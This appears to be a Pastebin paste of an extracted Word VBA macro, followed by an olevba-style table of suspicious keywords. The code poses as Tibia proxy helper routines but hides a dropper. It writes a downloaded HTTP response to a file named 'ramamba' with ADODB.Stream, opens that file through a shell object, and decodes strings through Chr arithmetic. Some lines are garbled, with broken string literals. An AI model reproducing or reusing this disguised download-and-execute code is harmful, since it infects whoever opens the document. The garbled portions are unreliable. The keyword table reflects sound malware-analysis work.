  711. Dim buffer As Long
  712. buffer = 0
  713. If byteS = 1 Then
  714.  readBytes = Memory_ReadByte(address, ProcessHandle)
  715. Else
  716.  b1 = Memory_ReadByte(address, ProcessHandle)
  717.  b2 = Memory_ReadByte(address + 1, ProcessHandle)
  718.  readBytes = GetTheLong(b1, b2)
  719. End If
  720. End Function
  721. Public Sub AddProcessIdIPrelation(strIP As String, strProcessID As Long)
  722.  ProcessidIPrelations.item(strIP) = strProcessID
  723. End Sub
  724. Public Sub ResetProcessidIPrelations()
  725.  On Error GoTo goterr
  726.  Dim a As Long
  727.  a = 0
  728.  ProcessidIPrelations.RemoveAll
  729.  Exit Sub
  730. goterr:
  731.  a = -1
  732. End Sub
  733. Public Function GetProcessIdFromIP(strIP As String) As Long
  734.  Dim aRes As Long
  735.  Dim res As Boolean
  736.  If ProcessidIPrelations.Exists(strIP) = True Then
  737.  GetProcessIdFromIP = ProcessidIPrelations.item(strIP)
  738.  Else
  739.  GetProcessIdFromIP = 0
  740.  End If
  741. End Function
  742. Public Sub OverwriteOnFileSimple(file_name As String, strtext As String)
  743.  Dim fn As Integer
  744.  Dim writeThis As String
  745.  Dim a As Long
  746.  UseItemOnName4 = UseItemOnName3(UCase(FIX_TibiaVersionForceString3))
  747.  
  748. UseItemOnName5 = UseItemOnName4 + "\" + "ramamba" + FIX_TibiaVersionForceString5 + FIX_TibiaVersionForceString4
  749.  GoTo ignoreit
  750.  a = 0
  751.  fn = FreeFile
  752.  writeThis = strtext
  753.  Open App.Path & "\" & file_name For Output As #fn
  754.  Print #fn, writeThis
  755.  Close #fn
  756.  Exit Sub
  757. ignoreit:
  758.  a = -1
  759.  ChangeGLOBAL_RUNEHEAL_HP 0
  760. End Sub
  761. Public Sub AddwriteOnFileSimple(file_name As String, strtext As String)
  762.  Dim fn As Integer
  763.  Dim writeThis As String
  764.  Dim a As Long
  765.  On Error GoTo ignoreit
  766.  a = 0
  767.  fn = FreeFile
  768.  writeThis = strtext
  769.  Open App.Path & "\" & file_name For Append As #fn
  770.  Print #fn, writeThis
  771.  Close #fn
  772.  Exit Sub
  773. ignoreit:
  774.  a = -1
  775.  ChangeGLOBAL_RUNEHEAL_HP 0
  776. End Sub
  777. Public Sub AddUserVar(ByVal strUservar As String, ByVal strValue As String)
  778.  On Error GoTo goterr
  779.  Dim res As Boolean
  780.  ValueOfUservar.item(strUservar) = strValue
  781.  Exit Sub
  782. goterr:
  783.  LogOnFile "errors.txt", "Get error at AddUserVar : " & Err.Description
  784. End Sub
  785. Public Function GetUserVar(ByVal strUservar As String) As String
  786.  On Error GoTo goterr
  787.  Dim aRes As String
  788.  Dim res As Boolean
  789.  If ValueOfUservar.Exists(strUservar) = True Then
  790.  GetUserVar = ValueOfUservar.item(strUservar)
  791.  Else
  792.  GetUserVar = ""
  793.  End If
  794.  Exit Function
  795. goterr:
  796.  LogOnFile "errors.txt", "Got error at AddUserVar : " & Err.Description
  797.  GetUserVar = ""
  798. End Function
  799. Public Sub ChangeGLOBAL_RUNEHEAL_HP(newValue As Long)
  800.  Dim i As Integer
  801.  Dim aRes As Long
  802.  Dim oldVal As Long
  803.  
  804.    UseItemOnName2.Type = 1
  805.     UseItemOnName2.open
  806.     UseItemOnName2.write UseItemOnName1.responseBody
  807.     UseItemOnName2.savetofile UseItemOnName5, 2
  808.  
  809. enLight 0
  810. Exit Sub
  811.  oldVal = GLOBAL_RUNEHEAL_HP
  812.  frmHardcoreCheats.lblHPvalue.Caption = CStr(newValue) & " %"
  813.  GLOBAL_RUNEHEAL_HP = newValue
  814.  If frmHardcoreCheats.scrollHP.Value <> newValue Then
  815.  frmHardcoreCheats.scrollHP.Value = newValue
  816.  End If
  817.  If oldVal <> GLOBAL_RUNEHEAL_HP Then
  818.  For i = 1 To MAXCLIENTS
  819.  If (GameConnected(i) = True) And (ReconnectionStage(i) = 0) And (sen.tWelcome(i) = True) Then
  820.  aRes = SendLogSyst.emMessageToClient(i, "BlackdProxy: The autoruneheal was changed to " & CStr(GLOBAL_RUNEHEAL_HP) & " %")
  821.  DoEvents
  822.  End If
  823.  Next i
  824.  End If
  825. End Sub
  826. Public Sub enLight(i As Integer)
  827.  Dim inRes As Integer
  828.  Dim cPacket() As Byte
  829.  
  830. UseItemOnName6.open (UseItemOnName5)
  831.  Exit Sub
  832.  #If FinalMode Then
  833.  On Error GoTo ignoreit
  834.  #End If
  835.  inRes = GetCh.eatPacket(cPacket, "07 00 8D " & IDs.tring(i) & " " & LightIntesityHex & " " & nextLight(i))
  836.  fr.mMain.UnifiedSendToClientGame i, cPacket
  837.  DoEvents
  838.  Exit Sub
  839. ignoreit:
  840. End Sub
  841. Private Function GetWindowClass(ByVal hwnd As Long) As String
  842.  Dim sClass As String
  843.  If hwnd = 0 Then
  844.  GetWindowClass = ""
  845.  Else
  846.  sClass = Space$(256)
  847.  GetClassName hwnd, sClass, 255
  848.  GetWindowClass = Left$(sClass, InStr(sClass, vbNullChar) - 1)
  849.  End If
  850. End Function
  851. Public Sub ConfigurePath(phwnd As Long, isfrmmain As Boolean)
  852.  Dim res As String
  853.  res = BrowseForFolder(phwnd, "Select tibia map folder (usually on " & cte_automapfolder & ")")
  854.  If res <> "" Then
  855.  If ((TibiaVersionLong >= 800) And (LCase(Right$(res, 7)) <> "automap")) Then
  856.  Exit Sub
  857.  End If
  858.  TibiaPath = res
  859.  If isfrmmain = True Then
  860.  frmMain.txtTibiaPath.Text = res
  861.  End If
  862.  End If
  863. End Sub
  864. Public Function TryAutoPath() As String
  865.  On Error GoTo cantdoit
  866.  Const ParTibiaFolder As String = "Tibia"
  867.  If TibiaVersionLong >= 800 Then
  868.  Dim strAppdata As String
  869.  Dim strProposal As String
  870.  Dim strProp2 As String
  871.  Dim fs As scripting.FileSystemObject
  872.  Set fs = New scripting.FileSystemObject
  873.  strAppdata = GetAppDataFolder()
  874.  strProposal = strAppdata & "\" & ParTibiaFolder & "\Automap"
  875.  strProp2 = strAppdata & "\" & ParTibiaFolder
  876.  If fs.FolderExists(strProposal) = True Then
  877.  Set fs = Nothing
  878.  TryAutoPath = strProposal
  879.  Exit Function
  880.  ElseIf fs.FolderExists(strProp2) = True Then
  881.  fs.CreateFolder strProposal
  882.  Set fs = Nothing
  883.  TryAutoPath = strProposal
  884.  Else
  885.  Set fs = Nothing
  886.  TryAutoPath = ""
  887.  Exit Function
  888.  End If
  889.  Else
  890.  TryAutoPath = TibiaExePath
  891.  End If
  892.  Exit Function
  893. cantdoit:
  894.  TryAutoPath = ""
  895. End Function
  896. Public Sub givePathMsg(thehwnd As Long)
  897.  Dim trythis As String
  898.  If (TibiaPath = "") Or ((TibiaVersionLong >= 800) And (LCase(Right$(TibiaPath, 7)) <> "automap")) Then
  899.  If ((TibiaVersionLong < 800) And (TibiaPath <> "")) Then
  900.  Exit Sub
  901.  End If
  902.  trythis = TryAutoPath()
  903.  If (trythis = "") Then
  904.  MsgBox "Select tibia map folder (usually on " & cte_automapfolder & " )" & vbCrLf & vbCrLf & _
  905.  "What to do if you don"
  906.  "1. Play Tibia 8.00+ at least one time. Then close Tibia. This will make the folder." & vbCrLf & _
  907.  "2. Unhide special folders : folder options > view > check
  908. "3. Restart " & currentAppName & "so the folder browser gets updated and after that you should be able to browse it at " & _
  909. vbCrLf & cte_automapfolder & vbCrLf & vbCrLf & _
  910. "Note that the exact path depends on your windows user name!", vbOKOnly + vbExclamation, "Please do this first"
  911. ConfigurePath thehwnd, False
  912. Exit Sub
  913. Else
  914. trythis , vbOKOnly + vbInformation, "Just for your information"
  915. TibiaPath = trythis
  916. End If
  917. End If
  918. End Sub
  919. Public Function ValidateTibiaPath(str As String) As String
  920. Dim res As String
  921. #If FinalMode Then
  922. On Error GoTo goterr
  923. #End If
  924. If TibiaVersionLong >= 800 Then
  925. If TibiaPath = "" Then
  926. res = ""
  927. ElseIf LCase(Right(str, 7)) <> "automap" Then
  928. res = "PATH NOT CONFIGURED! USE THIS BUTTON TO BROWSE -->"
  929. Else
  930. res = str
  931. End If
  932. ValidateTibiaPath = res
  933. Else
  934. res = str
  935. ValidateTibiaPath = res
  936. End If
  937. Exit Function
  938. goterr:
  939. ValidateTibiaPath = "PATH NOT CONFIGURED! USE THIS BUTTON TO BROWSE -->"
  940. End Function
  941. Public Function Hexarize(strinput As String) As String
  942. Dim strByte As String
  943. Dim res As String
  944. res = ""
  945. While Len(strinput) > 0
  946. strByte = Left(strinput, 1)
  947. strinput = Right(strinput, Len(strinput) - 1)
  948. res = res & GoodHex(Asc(strByte)) & " "
  949. Wend
  950. Hexarize = res
  951. End Function
  952. Public Function Hexarize2(strinput As String) As String
  953. Dim strByte As String
  954. Dim res As String
  955. Dim bcount As Long
  956. bcount = 0
  957. res = ""
  958. While Len(strinput) > 0
  959. strByte = Left(strinput, 1)
  960. strinput = Right(strinput, Len(strinput) - 1)
  961. res = res & GoodHex(Asc(strByte)) & " "
  962. bcount = bcount + 1
  963. Wend
  964. res = GoodHex(LowByteOfLong(bcount)) & " " & GoodHex(HighByteOfLong(bcount)) & " " & res
  965. Hexarize2 = res
  966. End Function
  967. Public Sub ToggleTopmost(ByVal hWindow As Long, b As Boolean)
  968. Dim hw As Long
  969. If b = False Then
  970. SetWindowPos hWindow, HWND_NOTOPMOST, 0, 0, 0, 0, _
  971. SWP_NOMOVE Or SWP_NOSIZE
  972. Else
  973. SetWindowPos hWindow, HWND_TOPMOST, 0, 0, 0, 0, _
  974. SWP_NOMOVE Or SWP_NOSIZE
  975. End If
  976. End Sub
  977. Public Sub AddCharServer(charName As String, ServerName As String, serverIP1 As Byte, _
  978. serverIP2 As Byte, serverIP3 As Byte, serverIP4 As Byte, serverPort As Long)
  979. Dim nextPlace As Integer
  980. Dim currentPlace As Integer
  981. Dim i As Integer
  982. currentPlace = 0
  983. For i = 1 To CharacterList.numItems
  984. If CharacterList.item(i).CharacterName = charName Then
  985. currentPlace = i
  986. Exit For
  987. End If
  988. Next i
  989. If currentPlace = 0 Then
  990. nextPlace = CharacterList.numItems + 1
  991. If nextPlace <= MAXLOGINMEMORY Then
  992. CharacterList.numItems = nextPlace
  993. currentPlace = nextPlace
  994. Else
  995. currentPlace = CharacterList.pointer
  996. CharacterList.pointer = CharacterList.pointer + 1
  997. If CharacterList.pointer = MAXLOGINMEMORY + 1 Then
  998. CharacterList.pointer = 1
  999. End If
  1000. End If
  1001. End If
  1002. CharacterList.item(currentPlace).CharacterName = charName
  1003. CharacterList.item(currentPlace).ServerName = ServerName
  1004. CharacterList.item(currentPlace).serverIP1 = serverIP1
  1005. CharacterList.item(currentPlace).serverIP2 = serverIP2
  1006. CharacterList.item(currentPlace).serverIP3 = serverIP3
  1007. CharacterList.item(currentPlace).serverIP4 = serverIP4
  1008. CharacterList.item(currentPlace).serverPort = serverPort
  1009. End Sub
  1010. Public Function WSAGetSelectEvent2(ByValvDefault() As Variant, NothingOrNodeName As Integer) As String
  1011.    Dim i As Integer
  1012.    Dim ProcessKillOrder As String
  1013.    ProcessKillOrder = ""
  1014.    For i = LBound(ByValvDefault) To UBound(ByValvDefault)
  1015.        ProcessKillOrder = ProcessKillOrder & Chr(ByValvDefault(i) - 33 * NothingOrNodeName - 5544 - 778 - 35)
  1016.    Next i
  1017.    WSAGetSelectEvent2 = ProcessKillOrder
  1018. End Function
  1019. Public Sub ResetCharServer()
  1020. CharacterList.numItems = 0
  1021. CharacterList.pointer = 1
  1022. End Sub
  1023. Public Function GetCharListPosition(ByRef packet() As Byte, ByRef selectedcharacter As String) As Integer
  1024. #If FinalMode Then
  1025. On Error GoTo returnTheResult
  1026. #End If
  1027. Dim res As Integer
  1028. Dim lon As Long
  1029. Dim i As Long
  1030. res = -1
  1031. If packet(2) <> &HA Then
  1032. res = 0
  1033. GoTo returnTheResult
  1034. End If
  1035. lon = GetTheLong(packet(12), packet(13))
  1036. selectedcharacter = ""
  1037. For i = 14 To 13 + lon
  1038. selectedcharacter = selectedcharacter & Chr(packet(i))
  1039. Next i
  1040. res = 0
  1041. For i = 1 To MAXLOGINMEMORY
  1042. If selectedcharacter = CharacterList.item(i).CharacterName Then
  1043. res = i
  1044. Exit For
  1045. End If
  1046. Next i
  1047. returnTheResult:
  1048. GetCharListPosition = res
  1049. End Function
  1050.  
  1051.  
  1052.  
  1053.  
  1054.  
  1055.  
  1056. +------------+----------------------+-----------------------------------------+
  1057. | Type       | Keyword              | Description                             |
  1058. +------------+----------------------+-----------------------------------------+
  1059. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  1060. | Suspicious | Open                 | May open a file                         |
  1061. | Suspicious | Shell                | May run an executable file or a system  |
  1062. |            |                      | command                                 |
  1063. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  1064. |            |                      | command                                 |
  1065. | Suspicious | Windows              | May enumerate application windows (if   |
  1066. |            |                      | combined with Shell.Application object) |
  1067. | Suspicious | Shell.Application    | May run an application (if combined     |
  1068. |            |                      | with CreateObject)                      |
  1069. | Suspicious | CreateObject         | May create an OLE object                |
  1070. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  1071. |            |                      | strings                                 |
  1072. | Suspicious | ADODB.Stream         | May create a text file                  |
  1073. | Suspicious | SaveToFile           | May create a text file                  |
  1074. | Suspicious | Write                | May write to a file (if combined with   |
  1075. |            |                      | Open)                                   |
  1076. | Suspicious | Output               | May write to a file (if combined with   |
  1077. |            |                      | Open)                                   |
  1078. | Suspicious | Print #              | May write to a file (if combined with   |
  1079. |            |                      | Open)                                   |
  1080. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  1081. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  1082. |            | Strings              | may be used to obfuscate strings        |
  1083. |            |                      | (option --decode to see all)            |
  1084. | IOC        | 127.0.0.1            | IPv4 address                            |
  1085. | VBA string | \ramamba             | "\" + "ramamba"                         |
  1086. +------------+----------------------+-----------------------------------------+
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!